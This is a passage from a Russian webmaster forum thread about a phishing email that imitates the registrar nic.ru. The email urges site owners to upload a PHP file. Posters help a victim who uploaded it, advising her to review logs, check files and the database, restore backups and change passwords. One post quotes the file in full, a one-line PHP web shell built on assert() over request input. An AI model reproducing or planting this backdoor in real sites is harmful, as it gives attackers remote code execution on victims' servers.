Мошенническая рассылка от nic.ru: Необходимо активировать домен

123
I7
На сайте с 12.06.2008
Offline
370
#11
Алина_:
Я точно лох... Вчера получила такое же письмо и закачала файл на сервер...😡 и только сегодня сообразила поспрашивать в и-нете...😕 Файл удалила, он простоял там сутки. Скажите, кто знает, - чего теперь ждать?... Насколько это было критично для сайта?
И что теперь можно сделать? - Я в полном дауне... 😒

Посмотрите по логам веб-сервера, были ли вообще обращения к этому файлу и какие. Возможно никак файл и не использовался.

AP
На сайте с 12.06.2015
Offline
74
#12
Алина_:
alexey_levkov:
Будьте внимательны.
Пришло письмо от noreply@nic.ru
В соответствии с изменениями, внесенными в ICANN RAA, Вы должны подтвердить...
<?php
assert(stripslashes($_REQUEST[RUCENTER]));
?>
Файл должен быть создан в течение трех дней... и находиться на сервере до 27 февраля 2017 года...

*********************************

Я точно лох... Вчера получила такое же письмо и закачала файл на сервер...😡 и только сегодня сообразила поспрашивать в и-нете...😕 Файл удалила, он простоял там сутки. Скажите, кто знает, - чего теперь ждать?... Насколько это было критично для сайта?
И что теперь можно сделать? - Я в полном дауне... 😒


Проверьте на изменение все файлы на хостинге (по дате можно отсортировать) и не появились ли новые.
И на всякий случай базу данных тоже проверьте - нет ли там лишних записей/таблиц.
M
На сайте с 04.12.2013
Offline
223
#13

Ky61k, создайте новую тему. Не видел в настройках модуля php отключение/включение самой ф-ции, только лога. Возможно, вы просто не совсем умело используете данную ф-цию.

Домены и скрипт для коротких ссылок: https://u75.ru/domains-for-shortcuts
А
На сайте с 11.02.2017
Offline
0
#14
Ilya74:
Посмотрите по логам веб-сервера, были ли вообще обращения к этому файлу и какие. Возможно никак файл и не использовался.

Спасибо большое за подсказку. :) Проверила логи - было одно обращение (с кодом 200) с адреса 54.226.234.119 из MаryLand - на всякий случай его заблокировала. Больше с него заходов не было, но это ни от чего не гарантирует... Проверяю нет ли измененных файлов на сервере по дате. 😡

S
На сайте с 23.05.2004
Offline
315
#15
Алина_:
Проверяю нет ли измененных файлов на сервере по дате

Подставить нужную дату - вообще не проблема. Имхо бесполезное занятие сравнивать даты. Только содержимое.

Это просто подпись.
А
На сайте с 11.02.2017
Offline
0
#16
A007MP:
И на всякий случай базу данных тоже проверьте - нет ли там лишних записей/таблиц.

Спасибо огромное :) хостинг проверила, все что менялось этим днем - заново поставила. По датам это просто. Но вот как проверить базу? Там ведь записей... 😕

---------- Добавлено 12.02.2017 в 05:29 ----------

Похоже, появилась таблица ts_redirects - но она пустая. Мог WordPress ее создать? 😕

AL
На сайте с 09.02.2010
Offline
199
#17
Алина_:
Спасибо огромное :) хостин и проверила, все что менялось этим днем - заново поставила. По датам это просто. Но вот как проверить базу? Там ведь записей... 😕

---------- Добавлено 12.02.2017 в 05:29 ----------

Похоже, появилась таблица ts_redirects - но она пустая. Мог WordPress ее создать? 😕

Самый простой вариант:

Восстановить бекап всего хостинга от того момента, когда файла еще не было. Всех файлов всех сайтов и всех баз.

Узнайте у хостера - есть ли такой бекап.

Все пароли к админкам и тд поменяйте после этого.

Перестаю тут обновлять темы, тк они стали платные. Пишите в телегу @Alex_Lab Все также перехватываю дропы RU под заказ и регулярно обновляю файл с дропами в продаже: https://docs.google.com/document/d/1wprrYn9Zweo8XlKsVQVXbh3rScPWm5y1NTm8Oua6ZUM
А
На сайте с 11.02.2017
Offline
0
#18

alexey_levkov, Благодарю, это хороший совет. ☝

А
На сайте с 11.02.2017
Offline
0
#19
miketomlin:
Подсунуть такое лоху элементарно, они ведь не в курсах про цифровую подпись письма и т.п. From: noreply@nic.ru

miketomlin, между прочим, эти мошенники уже продвинутые... 🙅 Уж, как они делают, не знаю, но From: noreply@nic.ru - в письме стоит!! Это первое, что я всегда смотрю. И все остальное как положено - и логотип, и телефоны реальные, и пр. И все в том же цвете, и в размере. Если не знать, что такое бывает, то отличить - никак... Так что не все так просто. В Ру-центре зачесались, мы им письмо переслали...

MS
На сайте с 02.03.2016
Offline
11
#20
Алина_:
miketomlin, между прочим, эти мошенники уже продвинутые... 🙅 Уж, как они делают, не знаю, но From: noreply@nic.ru - в письме стоит!! Это первое, что я всегда смотрю. И все остальное как положено - и логотип, и телефоны реальные, и пр. И все в том же цвете, и в размере. Если не знать, что такое бывает, то отличить - никак... Так что не все так просто. В Ру-центре зачесались, мы им письмо переслали...

Вот рассмешили, ПРОДВИНУТЫЕ :) Не старше 7-8 класса, а то может и того младше.

>В Ру-центре зачесались, мы им письмо переслали...

Скорее посмеялись над Вами и Вашим письмом.

Хорошо, что email отправителя не подставили - fsb@fsb.ru - с веселым содержанием :)

123

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий